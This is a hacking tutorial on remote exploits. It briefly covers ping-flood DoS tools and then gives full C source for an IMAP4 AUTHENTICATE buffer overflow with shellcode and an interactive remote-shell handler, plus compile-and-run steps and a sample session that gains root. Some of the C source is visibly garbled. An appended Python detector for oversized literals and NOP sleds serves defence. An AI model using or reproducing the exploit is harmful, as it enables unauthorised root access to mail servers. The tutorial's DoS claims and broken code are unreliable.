Techniques & Remote Exploits.
===============================================================================
Remote exploits work like this: you run a program on your computer,
that program sends something to the other computer, exploiting a vulnerability
and giving you access to the remote operating system.
The phf trick, which I talked about in the beginning, uses a bug in the
remote system to gain information that you normally wouldn't be allowed to get.
An exploit doesn't have to give you access to a computer, though;
a DoS (Denial of Service) attack is also a form of exploit. The simplest
way of performing a DoS attack is to send oversized fragmented ICMP pings
that cause Windows (95) to crash.
The best-known DoS attack programs that use this are 'teardrop',
'nestea' and 'nestea2'.
What happens is that when the Windows computer gets the oversized fragmented ping
it doesn't really know what to do with it, so it takes a lot of CPU time
to process it, and if you send several of those in a `flood` the system
locks up completely.
This is at least what I have heard is happening, but don't take that as any
absolute fact; I have not read the source code for any of those DoS attacks,
and I have not really read about flooding all that much...
Flooding as such is just sending so many pings that the remote modem
can't handle it and shuts down, or at least gets lagged. Anyway, flooding
is lame and you will end up in the remote computer's logs if they log...
And since DoS attacks and flooding are illegal, that is not a good idea.
-------------------------------------------------------------------------------
Note: lag / lagging is another word for long/bad ping times: the time it takes
from when you send a request to a remote computer until it responds and
the response gets back to your computer.
-------------------------------------------------------------------------------
Now let's take a look at a real remote exploit and what it does.
This exploit works for these imap versions:
IMAP4rev1 9.0
IMAP4rev1 v10.190
IMAP4rev1 v10.223
IMAP4rev1 v10.203
IMAP4 Service 8.3
So here we go:
===============================================================================
Here follows the exploit source code exactly as I got it from bugtraq.
===============================================================================
/* Ultimate IMAP4 sploit coded by The Tekneeq Crew */
/* http://www.attrition.org/hosted/tekneeq */
#include
#include
#include
#include
#include
#include
#include
#define RET_POS 1028
int connect_tcp(struct in_addr addr,unsigned short port);
int fdprintf(int dafd,char *fmt,...);
void RunShell(int thesock);
struct types {
char *name;
unsigned long ret_addr;
};
struct types types[]={
{"IMAP4rev1 9.0",0xbffff6e4},
{"IMAP4rev1 v10.190",0xbffff30f},
{"IMAP4rev1 v10.223",0xbffff6e4},
{"IMAP4rev1 v10.203",0xbffff30f},
{"IMAP4 Service 8.3",0xbffff724},
{NULL,0}
};
char overflow_buff[4096];
struct in_addr victim;
/* standard shellcode with a few modifications */
char hellcode[]=
"\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80\ x46\x03\x30"
"\x80\x46\x05\x30\x80\x46\x06\x30\x89\xf0\x89\x46\ x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\ x08\x8d\x56"
"\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\ xff\xff\xff"
"\x2f\x32\x39\x3e\x2f\x43\x38";
int main (int argc,char **argv)
{
unsigned long *ret;
char recvbuf[1024];
int sockfd;
int i,n=0;
if (argc < 2)
{
printf("Usage: %s [offset]\n",argv[0]);
exit(0);
}
if (!host_to_ip(argv[1],&victim))
{
fprintf(stderr,"Hostname lookup failure\n");
exit(0);
}
memset(overflow_buff,0x90,4096);
for (i=RET_POS-(strlen(hellcode));i< 0)
{
fprintf(stderr,"Error connecting to remote host\n");
exit(0);
}
n=read(sockfd,recvbuf,1024);
if (n <= 0) {
fprintf(stderr,"Connection closed\n");
exit(0);
}
printf("%s\n",recvbuf);
for (i=0;;i++)
{
if (types[i].name==NULL)
{
i=0;
break;
}
if (strstr(recvbuf,types[i].name))
break;
}
printf("Imap type %d\n",i);
ret=(unsigned long *)(overflow_buff+RET_POS);
*ret=types[i].ret_addr;
if (argv[2]) *ret+=(unsigned long)atoi(argv[2]);
overflow_buff[RET_POS+4]=0;
printf("Sending overflow\n");
fdprintf(sockfd,"* AUTHENTICATE {%d}\n",strlen(overflow_buff));
fdprintf(sockfd,"%s\r\n",overflow_buff);
read(sockfd,recvbuf,1024);
printf("Got shell\n");
RunShell(sockfd);
close(sockfd);
return;
}
void RunShell(int thesock)
{
int n;
char recvbuf[1024];
fd_set rset;
while (1)
{
FD_ZERO(&rset);
FD_SET(thesock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(thesock+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(thesock,&rset))
{
n=read(thesock,recvbuf,1024);
if (n <= 0)
{
printf("Connection closed\n");
exit(0);
}
recvbuf[n]=0;
printf("%s",recvbuf);
}
if (FD_ISSET(STDIN_FILENO,&rset))
{
n=read(STDIN_FILENO,recvbuf,1024);
if (n>0)
{
recvbuf[n]=0;
write(thesock,recvbuf,n);
}
}
}
}
int fdprintf(int dafd,char *fmt,...)
{
char mybuffer[4096];
va_list va;
va_start(va,fmt);
vsnprintf(mybuffer,4096,fmt,va);
write(dafd,mybuffer,strlen(mybuffer));
va_end(va);
return(1);
}
int connect_tcp(struct in_addr addr,unsigned short port)
{
struct sockaddr_in serv;
int thesock,flags;
thesock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
bzero(&serv,sizeof(serv));
memcpy(&serv.sin_addr,&addr,sizeof(struct in_addr));
serv.sin_port=htons(port);
serv.sin_family=AF_INET;
if (connect(thesock,(struct sockaddr *)&serv,sizeof(serv)) < 0)
return(-1);
else
return(thesock);
}
int host_to_ip(char *hostname,struct in_addr *addr)
{
struct hostent *res;
res=gethostbyname(hostname);
if (res==NULL)
return(0);
memcpy((char *)addr,res->h_addr,res->h_length);
return(1);
}
===============================================================================
Note: since this is not a socket coding tutorial I won't really go into what
every line in this exploit does, but I will cover it as a whole.
===============================================================================
To make this work:
Cut away what comes before "#include " and after the last "}",
name it something like "imapx.c", then compile it like this:
gcc -o imapx imapx.c
then run ./imapx ...... as in the following example:
-------------------------------------------------------------------------------
[user@localhost user]$ gcc -o imapx imapx.c
[user@localhost user]$ ./imapx 127.0.0.1
* OK
localhost.localdomain IMAP4rev1 Service 9.0(157) at Thu, 6 Jan 2000 07:33:39 +0900 (JST) (Report problems in this server to
MRC@CAC.Washington.EDU)
Imap type 0
Sending overflow
Got shell
whoami
root
exit
Connection closed by foreign host.
[user@localhost user]$
-------------------------------------------------------------------------------
[user@localhost user]$ gcc -o imapx imapx.c <<== Compiling the exploit.
[user@localhost user]$ ./imapx 127.0.0.1 <<== Executing it on myself.
*OK <<== Connected to host.
localhost.localdomain IMAP4rev1 Service 9.0(157) at Thu, 6 Jan 2000 07:33:39 +0900 (JST) [and more] <<== Server name, imap version, date, and so on.
Imap type 0 <<== This is the exploit's internal type number for the imap version.
Sending overflow <<== Does what it says, sending the actual exploit.
Got shell <<== Means it's ready; you are in the remote computer.
whoami <<== User input (this is the first command I send)
root <<== Answer from the computer, I am in as root.
exit <<== I exit the shell, and out of the remote computer.
Connection closed by foreign host. <<== Is what it says it is.
[user@localhost user]$ <<== Back in my own computer.
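For the other side of this exchange, here is an added example (my own code, not part of the original tutorial or of the Tekneeq exploit) of what an IMAP server log or a network monitor in front of the server could look for. The exploit above sends a client command of the form "* AUTHENTICATE {n}" followed by a literal of 1032 bytes (RET_POS + 4, as set in the source), nearly all of it 0x90 padding around the shellcode and the return address. The Python function below walks a captured client-to-server stream line by line and flags two signals: an AUTHENTICATE literal far larger than a normal credential blob, and a literal body dominated by 0x90 bytes. The thresholds and both sample sessions are constructed for this example, not values from the tutorial; the suspect session only copies the shape of the traffic (a large literal of 0x90 filler with placeholder bytes), not the real payload.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Thresholds are assumptions for this example, not values from the tutorial.
# A legitimate AUTHENTICATE literal is a short base64 credential blob, so
# anything beyond a few hundred bytes deserves a closer look.
MAX_AUTH_LITERAL = 512
# Fraction of a literal body made up of 0x90 (x86 NOP) bytes above which we flag it.
NOP_SLED_RATIO = 0.5

# Matches "<tag> AUTHENTICATE [<mechanism>] {<n>}" as sent by a client; the
# exploit above uses the tag "*" and no mechanism name.
AUTH_LITERAL_RE = re.compile(
    rb"^(?P<tag>\S+) AUTHENTICATE(?: \S+)? \{(?P<size>\d+)\}\r?\n?$", re.IGNORECASE
)


@dataclass
class Finding:
    line_no: int   # 1-based index into the captured stream
    reason: str    # "oversized-literal" or "nop-sled"
    detail: str


def inspect_imap_client_stream(lines: List[bytes]) -> List[Finding]:
    """Walk client-to-server lines and flag suspicious AUTHENTICATE literals."""
    findings: List[Finding] = []
    expecting_literal: Optional[int] = None

    for line_no, raw in enumerate(lines, start=1):
        if expecting_literal is not None:
            # This line is the literal body announced on the previous line.
            body = raw.rstrip(b"\r\n")
            nops = body.count(b"\x90")
            if body and nops / len(body) >= NOP_SLED_RATIO:
                findings.append(Finding(line_no, "nop-sled",
                                        f"{nops} of {len(body)} bytes are 0x90"))
            expecting_literal = None
            continue

        m = AUTH_LITERAL_RE.match(raw)
        if m:
            size = int(m.group("size"))
            if size > MAX_AUTH_LITERAL:
                findings.append(Finding(line_no, "oversized-literal",
                                        f"AUTHENTICATE announces a {size}-byte literal"))
            expecting_literal = size

    return findings


# Constructed sample traffic (not captured from a real server).
BENIGN_SESSION = [
    b"a001 AUTHENTICATE PLAIN\r\n",
    b"AGpvZQBzM2NyM3Q=\r\n",          # base64 of "\0joe\0s3cr3t", made up
    b"a002 SELECT INBOX\r\n",
]

# Same shape as the exploit's exchange: a "* AUTHENTICATE {1032}" line
# (RET_POS + 4 bytes, as in the source) followed by a literal that is
# almost entirely 0x90 padding. The non-0x90 bytes are placeholders, not shellcode.
SUSPECT_SESSION = [
    b"* AUTHENTICATE {1032}\n",
    b"\x90" * 1000 + b"\x41\x41\x41\x41" + b"\x90" * 24 + b"\x42\x42\x42\x42" + b"\r\n",
]

if __name__ == "__main__":
    for name, session in (("benign", BENIGN_SESSION), ("suspect", SUSPECT_SESSION)):
        for f in inspect_imap_client_stream(session):
            print(f"{name}: line {f.line_no}: {f.reason}: {f.detail}")
```

Run as-is, the benign session produces no findings and the suspect session produces two: the oversized literal on line 1 and the NOP sled on line 2. The size check fires before a single byte of the literal has been read, which is the point: a server (or a proxy in front of it) that compares the announced literal size against the buffer it is about to copy into never reaches the overflow in the first place.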
--------
Tested by Don on his 800 MHz computer xD
works

written by
Cloudy for Cdir